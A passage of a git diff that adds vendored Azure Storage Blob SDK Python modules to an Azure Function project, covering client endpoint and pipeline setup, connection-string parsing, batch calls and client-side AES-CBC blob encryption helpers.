secondary_hostname = "{}-secondary.{}.{}".format( + self.credential.account_name, service_name, SERVICE_HOST_BASE) + + if not self._hosts: + if len(account) > 1: + secondary_hostname = parsed_url.netloc.replace(account[0], account[0] + "-secondary") + if kwargs.get("secondary_hostname"): + secondary_hostname = kwargs["secondary_hostname"] + primary_hostname = (parsed_url.netloc + parsed_url.path).rstrip('/') + self._hosts = {LocationMode.PRIMARY: primary_hostname, LocationMode.SECONDARY: secondary_hostname} + + self.require_encryption = kwargs.get("require_encryption", False) + self.key_encryption_key = kwargs.get("key_encryption_key") + self.key_resolver_function = kwargs.get("key_resolver_function") + self._config, self._pipeline = self._create_pipeline(self.credential, storage_sdk=service, **kwargs) + + def __enter__(self): + self._client.__enter__() + return self + + def __exit__(self, *args): + self._client.__exit__(*args) + + def close(self): + """ This method is to close the sockets opened by the client. + It need not be used when using with a context manager. + """ + self._client.close() + + @property + def url(self): + """The full endpoint URL to this entity, including SAS token if used. + + This could be either the primary endpoint, + or the secondary endpoint depending on the current :func:`location_mode`. + """ + return self._format_url(self._hosts[self._location_mode]) + + @property + def primary_endpoint(self): + """The full primary endpoint URL. + + :type: str + """ + return self._format_url(self._hosts[LocationMode.PRIMARY]) + + @property + def primary_hostname(self): + """The hostname of the primary endpoint. + + :type: str + """ + return self._hosts[LocationMode.PRIMARY] + + @property + def secondary_endpoint(self): + """The full secondary endpoint URL if configured. + + If not available a ValueError will be raised. To explicitly specify a secondary hostname, use the optional + `secondary_hostname` keyword argument on instantiation. + + :type: str + :raise ValueError: + """ + if not self._hosts[LocationMode.SECONDARY]: + raise ValueError("No secondary host configured.") + return self._format_url(self._hosts[LocationMode.SECONDARY]) + + @property + def secondary_hostname(self): + """The hostname of the secondary endpoint. + + If not available this will be None. To explicitly specify a secondary hostname, use the optional + `secondary_hostname` keyword argument on instantiation. + + :type: str or None + """ + return self._hosts[LocationMode.SECONDARY] + + @property + def location_mode(self): + """The location mode that the client is currently using. + + By default this will be "primary". Options include "primary" and "secondary". + + :type: str + """ + + return self._location_mode + + @location_mode.setter + def location_mode(self, value): + if self._hosts.get(value): + self._location_mode = value + self._client._config.url = self.url # pylint: disable=protected-access + else: + raise ValueError("No host URL for location mode: {}".format(value)) + + @property + def api_version(self): + """The version of the Storage API used for requests. + + :type: str + """ + return self._client._config.version # pylint: disable=protected-access + + def _format_query_string(self, sas_token, credential, snapshot=None, share_snapshot=None): + query_str = "?" + if snapshot: + query_str += "snapshot={}&".format(self.snapshot) + if share_snapshot: + query_str += "sharesnapshot={}&".format(self.snapshot) + if sas_token and isinstance(credential, AzureSasCredential): + raise ValueError( + "You cannot use AzureSasCredential when the resource URI also contains a Shared Access Signature.") + if is_credential_sastoken(credential): + query_str += credential.lstrip("?") + credential = None + elif sas_token: + query_str += sas_token + return query_str.rstrip("?&"), credential + + def _create_pipeline(self, credential, **kwargs): + # type: (Any, **Any) -> Tuple[Configuration, Pipeline] + self._credential_policy = None + if hasattr(credential, "get_token"): + self._credential_policy = StorageBearerTokenCredentialPolicy(credential) + elif isinstance(credential, SharedKeyCredentialPolicy): + self._credential_policy = credential + elif isinstance(credential, AzureSasCredential): + self._credential_policy = AzureSasCredentialPolicy(credential) + elif credential is not None: + raise TypeError("Unsupported credential: {}".format(credential)) + + config = kwargs.get("_configuration") or create_configuration(**kwargs) + if kwargs.get("_pipeline"): + return config, kwargs["_pipeline"] + config.transport = kwargs.get("transport") # type: ignore + kwargs.setdefault("connection_timeout", CONNECTION_TIMEOUT) + kwargs.setdefault("read_timeout", READ_TIMEOUT) + if not config.transport: + config.transport = RequestsTransport(**kwargs) + policies = [ + QueueMessagePolicy(), + config.proxy_policy, + config.user_agent_policy, + StorageContentValidation(), + ContentDecodePolicy(response_encoding="utf-8"), + RedirectPolicy(**kwargs), + StorageHosts(hosts=self._hosts, **kwargs), + config.retry_policy, + config.headers_policy, + StorageRequestHook(**kwargs), + self._credential_policy, + config.logging_policy, + StorageResponseHook(**kwargs), + DistributedTracingPolicy(**kwargs), + HttpLoggingPolicy(**kwargs) + ] + if kwargs.get("_additional_pipeline_policies"): + policies = policies + kwargs.get("_additional_pipeline_policies") + return config, Pipeline(config.transport, policies=policies) + + def _batch_send( + self, + *reqs, # type: HttpRequest + **kwargs + ): + """Given a series of request, do a Storage batch call. + """ + # Pop it here, so requests doesn't feel bad about additional kwarg + raise_on_any_failure = kwargs.pop("raise_on_any_failure", True) + batch_id = str(uuid.uuid1()) + + request = self._client._client.post( # pylint: disable=protected-access + url='{}://{}/{}?{}comp=batch{}{}'.format( + self.scheme, + self.primary_hostname, + kwargs.pop('path', ""), + kwargs.pop('restype', ""), + kwargs.pop('sas', ""), + kwargs.pop('timeout', "") + ), + headers={ + 'x-ms-version': self.api_version, + "Content-Type": "multipart/mixed; boundary=" + _get_batch_request_delimiter(batch_id, False, False) + } + ) + + policies = [StorageHeadersPolicy()] + if self._credential_policy: + policies.append(self._credential_policy) + + request.set_multipart_mixed( + *reqs, + policies=policies, + enforce_https=False + ) + + Pipeline._prepare_multipart_mixed_request(request) # pylint: disable=protected-access + body = serialize_batch_body(request.multipart_mixed_info[0], batch_id) + request.set_bytes_body(body) + + temp = request.multipart_mixed_info + request.multipart_mixed_info = None + pipeline_response = self._pipeline.run( + request, **kwargs + ) + response = pipeline_response.http_response + request.multipart_mixed_info = temp + + try: + if response.status_code not in [202]: + raise HttpResponseError(response=response) + parts = response.parts() + if raise_on_any_failure: + parts = list(response.parts()) + if any(p for p in parts if not 200 <= p.status_code < 300): + error = PartialBatchErrorException( + message="There is a partial failure in the batch operation.", + response=response, parts=parts + ) + raise error + return iter(parts) + return parts + except HttpResponseError as error: + process_storage_error(error) + +class TransportWrapper(HttpTransport): + """Wrapper class that ensures that an inner client created + by a `get_client` method does not close the outer transport for the parent + when used in a context manager. + """ + def __init__(self, transport): + self._transport = transport + + def send(self, request, **kwargs): + return self._transport.send(request, **kwargs) + + def open(self): + pass + + def close(self): + pass + + def __enter__(self): + pass + + def __exit__(self, *args): # pylint: disable=arguments-differ + pass + + +def _format_shared_key_credential(account_name, credential): + if isinstance(credential, six.string_types): + if not account_name: + raise ValueError("Unable to determine account name for shared key credential.") + credential = {"account_name": account_name, "account_key": credential} + if isinstance(credential, dict): + if "account_name" not in credential: + raise ValueError("Shared key credential missing 'account_name") + if "account_key" not in credential: + raise ValueError("Shared key credential missing 'account_key") + return SharedKeyCredentialPolicy(**credential) + return credential + + +def parse_connection_str(conn_str, credential, service): + conn_str = conn_str.rstrip(";") + conn_settings = [s.split("=", 1) for s in conn_str.split(";")] + if any(len(tup) != 2 for tup in conn_settings): + raise ValueError("Connection string is either blank or malformed.") + conn_settings = dict((key.upper(), val) for key, val in conn_settings) + endpoints = _SERVICE_PARAMS[service] + primary = None + secondary = None + if not credential: + try: + credential = {"account_name": conn_settings["ACCOUNTNAME"], "account_key": conn_settings["ACCOUNTKEY"]} + except KeyError: + credential = conn_settings.get("SHAREDACCESSSIGNATURE") + if endpoints["primary"] in conn_settings: + primary = conn_settings[endpoints["primary"]] + if endpoints["secondary"] in conn_settings: + secondary = conn_settings[endpoints["secondary"]] + else: + if endpoints["secondary"] in conn_settings: + raise ValueError("Connection string specifies only secondary endpoint.") + try: + primary = "{}://{}.{}.{}".format( + conn_settings["DEFAULTENDPOINTSPROTOCOL"], + conn_settings["ACCOUNTNAME"], + service, + conn_settings["ENDPOINTSUFFIX"], + ) + secondary = "{}-secondary.{}.{}".format( + conn_settings["ACCOUNTNAME"], service, conn_settings["ENDPOINTSUFFIX"] + ) + except KeyError: + pass + + if not primary: + try: + primary = "https://{}.{}.{}".format( + conn_settings["ACCOUNTNAME"], service, conn_settings.get("ENDPOINTSUFFIX", SERVICE_HOST_BASE) + ) + except KeyError: + raise ValueError("Connection string missing required connection details.") + if service == "dfs": + primary = primary.replace(".blob.", ".dfs.") + secondary = secondary.replace(".blob.", ".dfs.") + return primary, secondary, credential + + +def create_configuration(**kwargs): + # type: (**Any) -> Configuration + config = Configuration(**kwargs) + config.headers_policy = StorageHeadersPolicy(**kwargs) + config.user_agent_policy = UserAgentPolicy( + sdk_moniker="storage-{}/{}".format(kwargs.pop('storage_sdk'), VERSION), **kwargs) + config.retry_policy = kwargs.get("retry_policy") or ExponentialRetry(**kwargs) + config.logging_policy = StorageLoggingPolicy(**kwargs) + config.proxy_policy = ProxyPolicy(**kwargs) + + # Storage settings + config.max_single_put_size = kwargs.get("max_single_put_size", 64 * 1024 * 1024) + config.copy_polling_interval = 15 + + # Block blob uploads + config.max_block_size = kwargs.get("max_block_size", 4 * 1024 * 1024) + config.min_large_block_upload_threshold = kwargs.get("min_large_block_upload_threshold", 4 * 1024 * 1024 + 1) + config.use_byte_buffer = kwargs.get("use_byte_buffer", False) + + # Page blob uploads + config.max_page_size = kwargs.get("max_page_size", 4 * 1024 * 1024) + + # Datalake file uploads + config.min_large_chunk_upload_threshold = kwargs.get("min_large_chunk_upload_threshold", 100 * 1024 * 1024 + 1) + + # Blob downloads + config.max_single_get_size = kwargs.get("max_single_get_size", 32 * 1024 * 1024) + config.max_chunk_get_size = kwargs.get("max_chunk_get_size", 4 * 1024 * 1024) + + # File uploads + config.max_range_size = kwargs.get("max_range_size", 4 * 1024 * 1024) + return config + + +def parse_query(query_str): + sas_values = QueryStringConstants.to_list() + parsed_query = {k: v[0] for k, v in parse_qs(query_str).items()} + sas_params = ["{}={}".format(k, quote(v, safe='')) for k, v in parsed_query.items() if k in sas_values] + sas_token = None + if sas_params: + sas_token = "&".join(sas_params) + + snapshot = parsed_query.get("snapshot") or parsed_query.get("sharesnapshot") + return snapshot, sas_token + + +def is_credential_sastoken(credential): + if not credential or not isinstance(credential, six.string_types): + return False + + sas_values = QueryStringConstants.to_list() + parsed_query = parse_qs(credential.lstrip("?")) + if parsed_query and all([k in sas_values for k in parsed_query.keys()]): + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client_async.py new file mode 100644 index 0000000..c015771 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client_async.py @@ -0,0 +1,191 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, Type, Tuple, + TYPE_CHECKING +) +import logging + +from azure.core.credentials import AzureSasCredential +from azure.core.pipeline import AsyncPipeline +from azure.core.async_paging import AsyncList +from azure.core.exceptions import HttpResponseError +from azure.core.pipeline.policies import ( + AsyncRedirectPolicy, + AzureSasCredentialPolicy, + ContentDecodePolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, +) +from azure.core.pipeline.transport import AsyncHttpTransport + +from .constants import CONNECTION_TIMEOUT, READ_TIMEOUT +from .authentication import SharedKeyCredentialPolicy +from .base_client import create_configuration +from .policies import ( + StorageContentValidation, + StorageHeadersPolicy, + StorageHosts, + StorageRequestHook, + QueueMessagePolicy +) +from .policies_async import AsyncStorageBearerTokenCredentialPolicy, AsyncStorageResponseHook + +from .response_handlers import process_storage_error, PartialBatchErrorException + +if TYPE_CHECKING: + from azure.core.pipeline import Pipeline + from azure.core.pipeline.transport import HttpRequest + from azure.core.configuration import Configuration +_LOGGER = logging.getLogger(__name__) + + +class AsyncStorageAccountHostsMixin(object): + + def __enter__(self): + raise TypeError("Async client only supports 'async with'.") + + def __exit__(self, *args): + pass + + async def __aenter__(self): + await self._client.__aenter__() + return self + + async def __aexit__(self, *args): + await self._client.__aexit__(*args) + + async def close(self): + """ This method is to close the sockets opened by the client. + It need not be used when using with a context manager. + """ + await self._client.close() + + def _create_pipeline(self, credential, **kwargs): + # type: (Any, **Any) -> Tuple[Configuration, Pipeline] + self._credential_policy = None + if hasattr(credential, 'get_token'): + self._credential_policy = AsyncStorageBearerTokenCredentialPolicy(credential) + elif isinstance(credential, SharedKeyCredentialPolicy): + self._credential_policy = credential + elif isinstance(credential, AzureSasCredential): + self._credential_policy = AzureSasCredentialPolicy(credential) + elif credential is not None: + raise TypeError("Unsupported credential: {}".format(credential)) + config = kwargs.get('_configuration') or create_configuration(**kwargs) + if kwargs.get('_pipeline'): + return config, kwargs['_pipeline'] + config.transport = kwargs.get('transport') # type: ignore + kwargs.setdefault("connection_timeout", CONNECTION_TIMEOUT) + kwargs.setdefault("read_timeout", READ_TIMEOUT) + if not config.transport: + try: + from azure.core.pipeline.transport import AioHttpTransport + except ImportError: + raise ImportError("Unable to create async transport. Please check aiohttp is installed.") + config.transport = AioHttpTransport(**kwargs) + policies = [ + QueueMessagePolicy(), + config.headers_policy, + config.proxy_policy, + config.user_agent_policy, + StorageContentValidation(), + StorageRequestHook(**kwargs), + self._credential_policy, + ContentDecodePolicy(response_encoding="utf-8"), + AsyncRedirectPolicy(**kwargs), + StorageHosts(hosts=self._hosts, **kwargs), # type: ignore + config.retry_policy, + config.logging_policy, + AsyncStorageResponseHook(**kwargs), + DistributedTracingPolicy(**kwargs), + HttpLoggingPolicy(**kwargs), + ] + if kwargs.get("_additional_pipeline_policies"): + policies = policies + kwargs.get("_additional_pipeline_policies") + return config, AsyncPipeline(config.transport, policies=policies) + + async def _batch_send( + self, + *reqs, # type: HttpRequest + **kwargs + ): + """Given a series of request, do a Storage batch call. + """ + # Pop it here, so requests doesn't feel bad about additional kwarg + raise_on_any_failure = kwargs.pop("raise_on_any_failure", True) + request = self._client._client.post( # pylint: disable=protected-access + url='{}://{}/{}?{}comp=batch{}{}'.format( + self.scheme, + self.primary_hostname, + kwargs.pop('path', ""), + kwargs.pop('restype', ""), + kwargs.pop('sas', ""), + kwargs.pop('timeout', "") + ), + headers={ + 'x-ms-version': self.api_version + } + ) + + policies = [StorageHeadersPolicy()] + if self._credential_policy: + policies.append(self._credential_policy) + + request.set_multipart_mixed( + *reqs, + policies=policies, + enforce_https=False + ) + + pipeline_response = await self._pipeline.run( + request, **kwargs + ) + response = pipeline_response.http_response + + try: + if response.status_code not in [202]: + raise HttpResponseError(response=response) + parts = response.parts() # Return an AsyncIterator + if raise_on_any_failure: + parts_list = [] + async for part in parts: + parts_list.append(part) + if any(p for p in parts_list if not 200 <= p.status_code < 300): + error = PartialBatchErrorException( + message="There is a partial failure in the batch operation.", + response=response, parts=parts_list + ) + raise error + return AsyncList(parts_list) + return parts + except HttpResponseError as error: + process_storage_error(error) + + +class AsyncTransportWrapper(AsyncHttpTransport): + """Wrapper class that ensures that an inner client created + by a `get_client` method does not close the outer transport for the parent + when used in a context manager. + """ + def __init__(self, async_transport): + self._transport = async_transport + + async def send(self, request, **kwargs): + return await self._transport.send(request, **kwargs) + + async def open(self): + pass + + async def close(self): + pass + + async def __aenter__(self): + pass + + async def __aexit__(self, *args): # pylint: disable=arguments-differ + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/constants.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/constants.py new file mode 100644 index 0000000..bdda02f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/constants.py @@ -0,0 +1,19 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from .._serialize import _SUPPORTED_API_VERSIONS + + +X_MS_VERSION = _SUPPORTED_API_VERSIONS[-1] + +# Default socket timeouts, in seconds +CONNECTION_TIMEOUT = 20 +READ_TIMEOUT = 80000 # 4000MB (max block size) / 50KB/s (an arbitrarily chosen minimum upload speed) + +DEFAULT_OAUTH_SCOPE = "/.default" +STORAGE_OAUTH_SCOPE = "https://storage.azure.com/.default" + +SERVICE_HOST_BASE = 'core.windows.net' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/encryption.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/encryption.py new file mode 100644 index 0000000..a996b64 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/encryption.py @@ -0,0 +1,542 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import os +from os import urandom +from json import ( + dumps, + loads, +) +from collections import OrderedDict + +from cryptography.hazmat.backends import default_backend +from cryptography.hazmat.primitives.ciphers import Cipher +from cryptography.hazmat.primitives.ciphers.algorithms import AES +from cryptography.hazmat.primitives.ciphers.modes import CBC +from cryptography.hazmat.primitives.padding import PKCS7 + +from azure.core.exceptions import HttpResponseError + +from .._version import VERSION +from . import encode_base64, decode_base64_to_bytes + + +_ENCRYPTION_PROTOCOL_V1 = '1.0' +_ERROR_OBJECT_INVALID = \ + '{0} does not define a complete interface. Value of {1} is either missing or invalid.' + + +def _validate_not_none(param_name, param): + if param is None: + raise ValueError('{0} should not be None.'.format(param_name)) + + +def _validate_key_encryption_key_wrap(kek): + # Note that None is not callable and so will fail the second clause of each check. + if not hasattr(kek, 'wrap_key') or not callable(kek.wrap_key): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'wrap_key')) + if not hasattr(kek, 'get_kid') or not callable(kek.get_kid): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'get_kid')) + if not hasattr(kek, 'get_key_wrap_algorithm') or not callable(kek.get_key_wrap_algorithm): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'get_key_wrap_algorithm')) + + +class _EncryptionAlgorithm(object): + ''' + Specifies which client encryption algorithm is used. + ''' + AES_CBC_256 = 'AES_CBC_256' + + +class _WrappedContentKey: + ''' + Represents the envelope key details stored on the service. + ''' + + def __init__(self, algorithm, encrypted_key, key_id): + ''' + :param str algorithm: + The algorithm used for wrapping. + :param bytes encrypted_key: + The encrypted content-encryption-key. + :param str key_id: + The key-encryption-key identifier string. + ''' + + _validate_not_none('algorithm', algorithm) + _validate_not_none('encrypted_key', encrypted_key) + _validate_not_none('key_id', key_id) + + self.algorithm = algorithm + self.encrypted_key = encrypted_key + self.key_id = key_id + + +class _EncryptionAgent: + ''' + Represents the encryption agent stored on the service. + It consists of the encryption protocol version and encryption algorithm used. + ''' + + def __init__(self, encryption_algorithm, protocol): + ''' + :param _EncryptionAlgorithm encryption_algorithm: + The algorithm used for encrypting the message contents. + :param str protocol: + The protocol version used for encryption. + ''' + + _validate_not_none('encryption_algorithm', encryption_algorithm) + _validate_not_none('protocol', protocol) + + self.encryption_algorithm = str(encryption_algorithm) + self.protocol = protocol + + +class _EncryptionData: + ''' + Represents the encryption data that is stored on the service. + ''' + + def __init__(self, content_encryption_IV, encryption_agent, wrapped_content_key, + key_wrapping_metadata): + ''' + :param bytes content_encryption_IV: + The content encryption initialization vector. + :param _EncryptionAgent encryption_agent: + The encryption agent. + :param _WrappedContentKey wrapped_content_key: + An object that stores the wrapping algorithm, the key identifier, + and the encrypted key bytes. + :param dict key_wrapping_metadata: + A dict containing metadata related to the key wrapping. + ''' + + _validate_not_none('content_encryption_IV', content_encryption_IV) + _validate_not_none('encryption_agent', encryption_agent) + _validate_not_none('wrapped_content_key', wrapped_content_key) + + self.content_encryption_IV = content_encryption_IV + self.encryption_agent = encryption_agent + self.wrapped_content_key = wrapped_content_key + self.key_wrapping_metadata = key_wrapping_metadata + + +def _generate_encryption_data_dict(kek, cek, iv): + ''' + Generates and returns the encryption metadata as a dict. + + :param object kek: The key encryption key. See calling functions for more information. + :param bytes cek: The content encryption key. + :param bytes iv: The initialization vector. + :return: A dict containing all the encryption metadata. + :rtype: dict + ''' + # Encrypt the cek. + wrapped_cek = kek.wrap_key(cek) + + # Build the encryption_data dict. + # Use OrderedDict to comply with Java's ordering requirement. + wrapped_content_key = OrderedDict() + wrapped_content_key['KeyId'] = kek.get_kid() + wrapped_content_key['EncryptedKey'] = encode_base64(wrapped_cek) + wrapped_content_key['Algorithm'] = kek.get_key_wrap_algorithm() + + encryption_agent = OrderedDict() + encryption_agent['Protocol'] = _ENCRYPTION_PROTOCOL_V1 + encryption_agent['EncryptionAlgorithm'] = _EncryptionAlgorithm.AES_CBC_256 + + encryption_data_dict = OrderedDict() + encryption_data_dict['WrappedContentKey'] = wrapped_content_key + encryption_data_dict['EncryptionAgent'] = encryption_agent + encryption_data_dict['ContentEncryptionIV'] = encode_base64(iv) + encryption_data_dict['KeyWrappingMetadata'] = {'EncryptionLibrary': 'Python ' + VERSION} + + return encryption_data_dict + + +def _dict_to_encryption_data(encryption_data_dict): + ''' + Converts the specified dictionary to an EncryptionData object for + eventual use in decryption. + + :param dict encryption_data_dict: + The dictionary containing the encryption data. + :return: an _EncryptionData object built from the dictionary. + :rtype: _EncryptionData + ''' + try: + if encryption_data_dict['EncryptionAgent']['Protocol'] != _ENCRYPTION_PROTOCOL_V1: + raise ValueError("Unsupported encryption version.") + except KeyError: + raise ValueError("Unsupported encryption version.") + wrapped_content_key = encryption_data_dict['WrappedContentKey'] + wrapped_content_key = _WrappedContentKey(wrapped_content_key['Algorithm'], + decode_base64_to_bytes(wrapped_content_key['EncryptedKey']), + wrapped_content_key['KeyId']) + + encryption_agent = encryption_data_dict['EncryptionAgent'] + encryption_agent = _EncryptionAgent(encryption_agent['EncryptionAlgorithm'], + encryption_agent['Protocol']) + + if 'KeyWrappingMetadata' in encryption_data_dict: + key_wrapping_metadata = encryption_data_dict['KeyWrappingMetadata'] + else: + key_wrapping_metadata = None + + encryption_data = _EncryptionData(decode_base64_to_bytes(encryption_data_dict['ContentEncryptionIV']), + encryption_agent, + wrapped_content_key, + key_wrapping_metadata) + + return encryption_data + + +def _generate_AES_CBC_cipher(cek, iv): + ''' + Generates and returns an encryption cipher for AES CBC using the given cek and iv. + + :param bytes[] cek: The content encryption key for the cipher. + :param bytes[] iv: The initialization vector for the cipher. + :return: A cipher for encrypting in AES256 CBC. + :rtype: ~cryptography.hazmat.primitives.ciphers.Cipher + ''' + + backend = default_backend() + algorithm = AES(cek) + mode = CBC(iv) + return Cipher(algorithm, mode, backend) + + +def _validate_and_unwrap_cek(encryption_data, key_encryption_key=None, key_resolver=None): + ''' + Extracts and returns the content_encryption_key stored in the encryption_data object + and performs necessary validation on all parameters. + :param _EncryptionData encryption_data: + The encryption metadata of the retrieved value. + :param obj key_encryption_key: + The key_encryption_key used to unwrap the cek. Please refer to high-level service object + instance variables for more details. + :param func key_resolver: + A function used that, given a key_id, will return a key_encryption_key. Please refer + to high-level service object instance variables for more details. + :return: the content_encryption_key stored in the encryption_data object. + :rtype: bytes[] + ''' + + _validate_not_none('content_encryption_IV', encryption_data.content_encryption_IV) + _validate_not_none('encrypted_key', encryption_data.wrapped_content_key.encrypted_key) + + if _ENCRYPTION_PROTOCOL_V1 != encryption_data.encryption_agent.protocol: + raise ValueError('Encryption version is not supported.') + + content_encryption_key = None + + # If the resolver exists, give priority to the key it finds. + if key_resolver is not None: + key_encryption_key = key_resolver(encryption_data.wrapped_content_key.key_id) + + _validate_not_none('key_encryption_key', key_encryption_key) + if not hasattr(key_encryption_key, 'get_kid') or not callable(key_encryption_key.get_kid): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'get_kid')) + if not hasattr(key_encryption_key, 'unwrap_key') or not callable(key_encryption_key.unwrap_key): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'unwrap_key')) + if encryption_data.wrapped_content_key.key_id != key_encryption_key.get_kid(): + raise ValueError('Provided or resolved key-encryption-key does not match the id of key used to encrypt.') + # Will throw an exception if the specified algorithm is not supported. + content_encryption_key = key_encryption_key.unwrap_key(encryption_data.wrapped_content_key.encrypted_key, + encryption_data.wrapped_content_key.algorithm) + _validate_not_none('content_encryption_key', content_encryption_key) + + return content_encryption_key + + +def _decrypt_message(message, encryption_data, key_encryption_key=None, resolver=None): + ''' + Decrypts the given ciphertext using AES256 in CBC mode with 128 bit padding. + Unwraps the content-encryption-key using the user-provided or resolved key-encryption-key (kek). + Returns the original plaintex. + + :param str message: + The ciphertext to be decrypted. + :param _EncryptionData encryption_data: + The metadata associated with this ciphertext. + :param object key_encryption_key: + The user-provided key-encryption-key. Must implement the following methods: + unwrap_key(key, algorithm) + - returns the unwrapped form of the specified symmetric key using the string-specified algorithm. + get_kid() + - returns a string key id for this key-encryption-key. + :param function resolver(kid): + The user-provided key resolver. Uses the kid string to return a key-encryption-key + implementing the interface defined above. + :return: The decrypted plaintext. + :rtype: str + ''' + _validate_not_none('message', message) + content_encryption_key = _validate_and_unwrap_cek(encryption_data, key_encryption_key, resolver) + + if _EncryptionAlgorithm.AES_CBC_256 != encryption_data.encryption_agent.encryption_algorithm: + raise ValueError('Specified encryption algorithm is not supported.') + + cipher = _generate_AES_CBC_cipher(content_encryption_key, encryption_data.content_encryption_IV) + + # decrypt data + decrypted_data = message + decryptor = cipher.decryptor() + decrypted_data = (decryptor.update(decrypted_data) + decryptor.finalize()) + + # unpad data + unpadder = PKCS7(128).unpadder() + decrypted_data = (unpadder.update(decrypted_data) + unpadder.finalize()) + + return decrypted_data + + +def encrypt_blob(blob, key_encryption_key): + ''' + Encrypts the given blob using AES256 in CBC mode with 128 bit padding. + Wraps the generated content-encryption-key using the user-provided key-encryption-key (kek). + Returns a json-formatted string containing the encryption metadata. This method should + only be used when a blob is small enough for single shot upload. Encrypting larger blobs + is done as a part of the upload_data_chunks method. + + :param bytes blob: + The blob to be encrypted. + :param object key_encryption_key: + The user-provided key-encryption-key. Must implement the following methods: + wrap_key(key)--wraps the specified key using an algorithm of the user's choice. + get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key. + get_kid()--returns a string key id for this key-encryption-key. + :return: A tuple of json-formatted string containing the encryption metadata and the encrypted blob data. + :rtype: (str, bytes) + ''' + + _validate_not_none('blob', blob) + _validate_not_none('key_encryption_key', key_encryption_key) + _validate_key_encryption_key_wrap(key_encryption_key) + + # AES256 uses 256 bit (32 byte) keys and always with 16 byte blocks + content_encryption_key = urandom(32) + initialization_vector = urandom(16) + + cipher = _generate_AES_CBC_cipher(content_encryption_key, initialization_vector) + + # PKCS7 with 16 byte blocks ensures compatibility with AES. + padder = PKCS7(128).padder() + padded_data = padder.update(blob) + padder.finalize() + + # Encrypt the data. + encryptor = cipher.encryptor() + encrypted_data = encryptor.update(padded_data) + encryptor.finalize() + encryption_data = _generate_encryption_data_dict(key_encryption_key, content_encryption_key, + initialization_vector) + encryption_data['EncryptionMode'] = 'FullBlob' + + return dumps(encryption_data), encrypted_data + + +def generate_blob_encryption_data(key_encryption_key): + ''' + Generates the encryption_metadata for the blob. + + :param bytes key_encryption_key: + The key-encryption-key used to wrap the cek associate with this blob. + :return: A tuple containing the cek and iv for this blob as well as the + serialized encryption metadata for the blob. + :rtype: (bytes, bytes, str) + ''' + encryption_data = None + content_encryption_key = None + initialization_vector = None + if key_encryption_key: + _validate_key_encryption_key_wrap(key_encryption_key) + content_encryption_key = urandom(32) + initialization_vector = urandom(16) + encryption_data = _generate_encryption_data_dict(key_encryption_key, + content_encryption_key, + initialization_vector) + encryption_data['EncryptionMode'] = 'FullBlob' + encryption_data = dumps(encryption_data) + + return content_encryption_key, initialization_vector, encryption_data + + +def decrypt_blob(require_encryption, key_encryption_key, key_resolver, + content, start_offset, end_offset, response_headers): + ''' + Decrypts the given blob contents and returns only the requested range. + + :param bool require_encryption: + Whether or not the calling blob service requires objects to be decrypted. + :param object key_encryption_key: + The user-provided key-encryption-key. Must implement the following methods: + wrap_key(key)--wraps the specified key using an algorithm of the user's choice. + get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key. + get_kid()--returns a string key id for this key-encryption-key. + :param key_resolver(kid): + The user-provided key resolver. Uses the kid string to return a key-encryption-key + implementing the interface defined above. + :return: The decrypted blob content. + :rtype: bytes + ''' + try: + encryption_data = _dict_to_encryption_data(loads(response_headers['x-ms-meta-encryptiondata'])) + except: # pylint: disable=bare-except + if require_encryption: + raise ValueError( + 'Encryption required, but received data does not contain appropriate metatadata.' + \ + 'Data was either not encrypted or metadata has been lost.') + + return content + + if encryption_data.encryption_agent.encryption_algorithm != _EncryptionAlgorithm.AES_CBC_256: + raise ValueError('Specified encryption algorithm is not supported.') + + blob_type = response_headers['x-ms-blob-type'] + + iv = None + unpad = False + if 'content-range' in response_headers: + content_range = response_headers['content-range'] + # Format: 'bytes x-y/size' + + # Ignore the word 'bytes' + content_range = content_range.split(' ') + + content_range = content_range[1].split('-') + content_range = content_range[1].split('/') + end_range = int(content_range[0]) + blob_size = int(content_range[1]) + + if start_offset >= 16: + iv = content[:16] + content = content[16:] + start_offset -= 16 + else: + iv = encryption_data.content_encryption_IV + + if end_range == blob_size - 1: + unpad = True + else: + unpad = True + iv = encryption_data.content_encryption_IV + + if blob_type == 'PageBlob': + unpad = False + + content_encryption_key = _validate_and_unwrap_cek(encryption_data, key_encryption_key, key_resolver) + cipher = _generate_AES_CBC_cipher(content_encryption_key, iv) + decryptor = cipher.decryptor() + + content = decryptor.update(content) + decryptor.finalize() + if unpad: + unpadder = PKCS7(128).unpadder() + content = unpadder.update(content) + unpadder.finalize() + + return content[start_offset: len(content) - end_offset] + + +def get_blob_encryptor_and_padder(cek, iv, should_pad): + encryptor = None + padder = None + + if cek is not None and iv is not None: + cipher = _generate_AES_CBC_cipher(cek, iv) + encryptor = 